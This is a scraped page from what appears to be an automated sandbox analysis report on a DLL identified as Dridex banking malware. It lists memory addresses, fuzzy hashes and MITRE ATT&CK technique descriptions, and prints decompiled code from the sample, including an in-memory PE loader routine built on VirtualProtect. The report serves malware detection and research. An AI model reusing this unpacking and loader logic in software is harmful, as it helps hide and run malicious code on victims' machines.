0x6e8f1a64
0x6e8f1a66
0x6e8f1aca
0x6e8f1acd
0x6e8f1acd
0x6e8f1acf
0x6e8f1ad2
0x6e8f1ad6
0x6e8f1ad6
0x6e8f1ada
0x00000000
0x00000000
0x6e8f1ae7
0x6e8f1aed
0x6e8f1b21
0x6e8f1b27
0x6e8f1b29
0x6e8f1bf8
0x6e8f1c00
0x6e8f1c03
0x6e8f1c05
0x6e8f1c1c
0x6e8f1c1c
0x6e8f1c07
0x6e8f1c0b
0x6e8f1c10
0x6e8f1c10
0x6e8f1c1e
0x6e8f1c24
0x6e8f1b43
0x6e8f1b43
0x6e8f1b45
0x6e8f1b45
0x6e8f1b47
0x6e8f1b47
0x6e8f1b4c
0x00000000
0x00000000
0x6e8f1b4e
0x6e8f1b4f
0x6e8f1b52
0x6e8f1b55
0x00000000
0x00000000
0x6e8f1b61
0x6e8f1b64
0x6e8f1b66
0x6e8f1b7d
0x6e8f1b7d
0x6e8f1b68
0x6e8f1b6c
0x6e8f1b71
0x6e8f1b71
0x6e8f1b8a
0x6e8f1b8d
0x6e8f1b96
0x6e8f1b99
0x6e8f1bbc
0x6e8f1bc0
0x00000000
0x6e8f1bc0
0x6e8f1ba1
0x6e8f1ba1
0x6e8f1bad
0x6e8f1bb0
0x6e8f1bb9
0x00000000
0x6e8f1bb9
0x6e8f1b2f
0x6e8f1b3f
0x6e8f1b3f
0x6e8f1b41
0x00000000
0x00000000
0x6e8f1b37
0x6e8f1b39
0x6e8f1b39
0x00000000
0x6e8f1b3f
0x6e8f1aef
0x6e8f1af7
0x6e8f1b17
0x6e8f1af9
0x6e8f1af9
0x6e8f1b01
0x6e8f1b0a
0x6e8f1b0a
0x6e8f1b01
0x00000000
0x6e8f1af7
0x6e8f1a68
0x6e8f1a6f
0x00000000
0x00000000
0x6e8f1a7c
0x6e8f1a82
0x6e8f1a87
0x6e8f1a8e
0x6e8f1a92
0x6e8f1aa7
0x6e8f1aa9
0x6e8f1aab
0x6e8f1ab1
0x6e8f1abf
0x6e8f1abf
0x6e8f1ac5
0x00000000
0x6e8f1ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8f1a0f
0x6e8f1a0f
0x6e8f1a0f
0x6e8f1a10
0x6e8f1a13
0x6e8f1a17
0x00000000
0x6e8f1a2d
0x6e8f1a30
0x6e8f1a33
0x6e8f1a3c
0x6e8f1a3f
0x6e8f1a40
0x6e8f1a42
0x00000000
0x6e8f147d
0x6e8f147f
0x6e8f1484
0x6e8f148f
0x6e8f149d
0x6e8f14b0
0x6e8f14bd
0x6e8f14c6
0x6e8f14ca
0x6e8f14ce
0x6e8f1516
0x6e8f1516
0x6e8f1518
0x6e8f151f
0x00000000
0x00000000
0x6e8f1538
0x6e8f1540
0x6e8f1544
0x6e8f1559
0x6e8f155d
0x6e8f1561
0x6e8f156a
0x6e8f1570
0x6e8f1573
0x6e8f1577
0x6e8f157f
0x6e8f1581
0x6e8f1585
0x6e8f158c
0x6e8f1595
0x6e8f1595
0x6e8f1599
0x6e8f15ae
0x6e8f15c4
0x6e8f15d1
0x6e8f15d2
0x6e8f15d2
0x6e8f15d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8f158e
0x6e8f158e
0x6e8f158e
0x6e8f158f
0x6e8f1590
0x00000000
0x6e8f158e
0x6e8f1553
0x6e8f1557
0x00000000
0x00000000
0x00000000
0x6e8f15d8
0x6e8f15d8
0x6e8f15d9
0x6e8f15dc
0x6e8f15e6
0x6e8f15e6
0x6e8f15ea
0x6e8f15f1
0x6e8f164c
0x6e8f1651
0x6e8f16a4
0x6e8f16a4
0x6e8f16a8
0x6e8f16ac
0x6e8f14d6
0x6e8f14d9
0x6e8f14de
0x6e8f14e4
0x6e8f14e7
0x6e8f14ee
0x6e8f14f2
0x6e8f14f9
0x6e8f1502
0x6e8f1506
0x6e8f150a
0x6e8f1510
0x00000000
0x00000000
0x00000000
0x6e8f1510
0x6e8f16b6
0x6e8f16c2
0x6e8f16cd
0x6e8f16d4
0x6e8f16dd
0x6e8f16e7
0x6e8f16e8
0x6e8f16f6
0x6e8f16fb
0x6e8f16fc
0x6e8f1709
0x6e8f170e
0x6e8f1720
0x6e8f1725
0x6e8f172a
0x6e8f173c
0x6e8f174e
0x6e8f1753
0x6e8f175e
0x6e8f1765
0x6e8f176a
0x6e8f1772
0x6e8f177b
0x6e8f177b
0x6e8f1787
0x6e8f178e
0x6e8f179a
0x6e8f17a6
0x6e8f17b4
0x6e8f17c5
0x6e8f17cc
0x6e8f17d1
0x6e8f17da
0x6e8f17df
0x6e8f17e1
0x6e8f17e5
0x6e8f17e9
0x6e8f17f6
0x6e8f1803
0x6e8f1807
0x6e8f181b
0x6e8f181f
0x00000000
0x00000000
0x6e8f1834
0x6e8f1836
0x6e8f183e
0x6e8f183b
0x6e8f183b
0x6e8f183b
0x6e8f1842
0x6e8f1844
0x6e8f184a
0x6e8f1850
0x6e8f18ac
0x6e8f18b5
0x6e8f18b9
0x6e8f18c6
0x6e8f18cf
0x6e8f18d4
0x6e8f18d8
0x6e8f18db
0x6e8f193c
0x6e8f1952
0x6e8f195d
0x6e8f195e
0x6e8f195f
0x6e8f1963
0x6e8f1966
0x6e8f1be6
0x6e8f1be9
0x6e8f1be9
0x00000000
0x6e8f1966
0x6e8f18e5
0x6e8f18f5
0x6e8f18fe
0x6e8f1907
0x6e8f1910
0x6e8f1911
0x6e8f1912
0x6e8f1917
0x6e8f191f
0x6e8f1927
0x00000000
0x00000000
0x00000000
0x6e8f1929
0x6e8f1859
0x6e8f185e
0x6e8f1862
0x6e8f1862
0x6e8f1866
0x6e8f1869
0x00000000
0x00000000
0x6e8f188a
0x6e8f188c
0x6e8f1890
0x6e8f1892
0x00000000
0x00000000
0x6e8f1894
0x6e8f189b
0x6e8f18a7
0x00000000
0x6e8f18a7
0x6e8f186e
0x00000000
0x6e8f196c
0x6e8f196c
0x6e8f196d
0x6e8f197d
0x6e8f1989
0x6e8f1992
0x6e8f199b
0x6e8f19a4
0x00000000
0x6e8f19a4
0x6e8f1653
0x6e8f1655
0x6e8f1657
0x6e8f165c
0x6e8f1661
0x6e8f1674
0x6e8f168a
0x6e8f1693
0x6e8f1694
0x6e8f1694
0x6e8f1696
0x6e8f1697
0x6e8f169a
0x6e8f169e
0x00000000
0x6e8f1657
0x6e8f15f3
0x6e8f15fd
0x6e8f15fe
0x6e8f15fe
0x6e8f160b
0x6e8f1617
0x6e8f1619
0x6e8f161b
0x6e8f161f
0x6e8f162f
0x6e8f162f
0x6e8f1636
0x6e8f1639
0x6e8f163a
0x6e8f163e
0x6e8f1648
0x00000000
0x6e8f1648

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25801660c4931909f14c60374dc9d81f2aaf02188bd137a235f55b86c4a39ff
Instruction ID: 7fab28ad840a6a73c215fc9c346425282216e2d6adccfe822262c6f8d1a33381
Opcode Fuzzy Hash: a25801660c4931909f14c60374dc9d81f2aaf02188bd137a235f55b86c4a39ff
Instruction Fuzzy Hash: EC328F70108345CFD714DFA8C890ADAB7E4FF95344F108D2DE595972A2EB70E94ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E8E6D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8E6D0C() {

				 *0x6e8fd280 = GetUserNameW;
				 *0x6E8FD284 = MessageBoxW;
				 *0x6E8FD288 = GetLastError;
				 *0x6E8FD28C = CreateFileA;
				 *0x6E8FD290 = DebugBreak;
				 *0x6E8FD294 = FlushFileBuffers;
				 *0x6E8FD298 = FreeEnvironmentStringsA;
				 *0x6E8FD29C = GetConsoleOutputCP;
				 *0x6E8FD2A0 = GetEnvironmentStrings;
				 *0x6E8FD2A4 = GetLocaleInfoA;
				 *0x6E8FD2A8 = GetStartupInfoA;
				 *0x6E8FD2AC = GetStringTypeA;
				 *0x6E8FD2B0 = HeapValidate;
				 *0x6E8FD2B4 = IsBadReadPtr;
				 *0x6E8FD2B8 = LCMapStringA;
				 *0x6E8FD2BC = LoadLibraryA;
				 *0x6E8FD2C0 = OutputDebugStringA;
				return 0x6e8fd280;
			}

0x6e8e6d1d
0x6e8e6d25
0x6e8e6d28
0x6e8e6d37
0x6e8e6d3a
0x6e8e6d49
0x6e8e6d4c
0x6e8e6d5b
0x6e8e6d5e
0x6e8e6d6d
0x6e8e6d70
0x6e8e6d7f
0x6e8e6d82
0x6e8e6d91
0x6e8e6d94
0x6e8e6da3
0x6e8e6da6
0x6e8e6da9

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd56095489c8136e07b36f10398def1af835a9dc57d1e0cd9bfb391bb67019e7
Instruction ID: 85e6da3f2a2f6449f456c7cee42d6d5c80f7e1a6555bed125f47a61f15edc05b
Opcode Fuzzy Hash: cd56095489c8136e07b36f10398def1af835a9dc57d1e0cd9bfb391bb67019e7
Instruction Fuzzy Hash: 3011DDB8A15A00CF8B48CF0AF190D517BF1BBCE3A035281EAD80E8B365D734A845DF94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4040 Parent PID: 1168 rundll32.exeCOMMON

Executed Functions

Function 00BF2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00BF2092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0xbf4418 = 1;
				asm("movaps xmm0, [0xbf3010]");
				asm("movups [0xbf4428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00BF1770();
				E00BF17BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E00BF1770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0xbf4418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E00BF1770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00bf209e
0x00bf20ac
0x00bf20b3
0x00bf20b6
0x00bf20c0
0x00bf20c7
0x00bf20d1
0x00bf20d7
0x00bf20e0
0x00bf20e9
0x00bf20ec
0x00bf20f0
0x00bf20f8
0x00bf20ff
0x00bf2102
0x00bf2105
0x00bf2108
0x00bf210b
0x00bf2125
0x00bf212b
0x00bf212e
0x00bf2136
0x00bf213a
0x00bf213d
0x00bf2140
0x00bf2143
0x00bf2146
0x00bf2162
0x00bf217f
0x00bf21a4
0x00bf21a6
0x00bf21af
0x00bf21b2
0x00bf21bc
0x00bf21bf
0x00bf21c2
0x00bf21c5
0x00bf21c8
0x00bf2216
0x00bf2216
0x00bf2249
0x00bf224c
0x00bf225c
0x00bf225f
0x00bf22a8
0x00bf22a8
0x00bf22b7
0x00bf22bf
0x00bf22cd
0x00bf22dc
0x00bf230d
0x00bf2316
0x00bf231a
0x00bf231e
0x00bf2325
0x00bf232b
0x00bf232d
0x00bf2336
0x00bf2347
0x00bf234d
0x00bf2350
0x00bf2353
0x00000000
0x00000000
0x00bf2359
0x00bf22a8
0x00bf2264
0x00bf2272
0x00bf227a
0x00bf227d
0x00bf227f
0x00bf2285
0x00bf2291
0x00bf2297
0x00bf229a
0x00bf229d
0x00bf21f9
0x00bf21f9
0x00bf236e
0x00bf2374
0x00bf2379
0x00bf237f
0x00bf2385
0x00bf238b
0x00bf2391
0x00bf2394
0x00bf2397
0x00bf239f
0x00bf23a7
0x00bf23ad
0x00bf23b3
0x00bf23b9
0x00bf23bf
0x00bf23cd
0x00bf21da
0x00bf21e0
0x00bf21e0
0x00bf2234

APIs

VirtualProtect.KERNELBASE ref: 00BF210B
VirtualProtect.KERNELBASE ref: 00BF21A4
VirtualProtect.KERNELBASE ref: 00BF232B

Strings

`, xrefs: 00BF239F

Memory Dump Source

Source File: 00000002.00000002.298814998.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: cc40c92d2d4efc8f880ef265c57831e4aec3e473ea03f7fd884f1204af1e8a8f
Instruction ID: 4e5069605731726c9890fe198e8e8fdcd998d69c4d9cad4b417864ef0bc0a43b
Opcode Fuzzy Hash: cc40c92d2d4efc8f880ef265c57831e4aec3e473ea03f7fd884f1204af1e8a8f
Instruction Fuzzy Hash: 54B1BFB5D00219CFCB14CF99C980AADBBF1FF88304F1585AAE958AB351D731A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00BF1000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00BF10FF

Memory Dump Source

Source File: 00000002.00000002.298814998.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: df95da09eefd2af4657135e930e61a123cee41945f4933221b5ddfbd0bd8240d
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: 2041D3B5E052198FDB04DFA8C4906AEBBF0FF48314F19896EE548AB340D775A844CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.26365.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Function 6E8F0730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6E8F2234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6E8F2820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6E8F3138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 009E2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Function 6E8F10A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6E8F57B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6E8F5B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 009E26AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 6E8F1166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6E8F5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E8F5BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6E8F5BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6E8F5BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6E8F5C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6E8F5E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6E8F5E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6E8F564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6E8F1030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6E8F3628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6E8E1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6E8EA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6E8E8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6E8F9370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6E8F143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6E8E6D0C, Relevance: .0, Instructions: 36
COMMON

Function 00BF2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON